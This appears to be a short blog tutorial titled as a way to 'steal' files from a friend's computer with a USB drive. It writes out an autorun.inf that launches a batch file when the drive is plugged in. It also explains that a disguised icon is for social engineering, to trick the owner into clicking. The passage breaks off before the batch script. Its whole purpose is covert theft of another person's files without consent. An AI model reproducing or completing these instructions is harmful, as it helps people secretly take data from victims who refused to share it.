How to copy (steal) files from any computer to your Pendrive
Hello friends , have you ever been in a situation like you want something from your friend’s PC like games , movies , videos , pictures etc. which he or she is not giving to you. Now here I come with a trick you just have to plug your USB Flash drive into your friend’s PC to automatically copy files to your pen drive, secretly and silently. Just copy the files you brought from their PC to complete the act. Cool , isn’t it? So let’s create such a sinister USB Flash drive. STEP 1 First of all open Notepad (I will say use the Notepad++) and copy-paste or type the following lines. [autorun] icon=drive.ico open=launch.bat action=Click OK to Run shell\open\command=launch.bat Save this as autorun.inf The icon line is optional. You can replace the icon to your choice or leave it to the default icon. It’s just for social engineering purposes like encouraging the user to click a file on the drive by making it looks like a game or movie. The “action...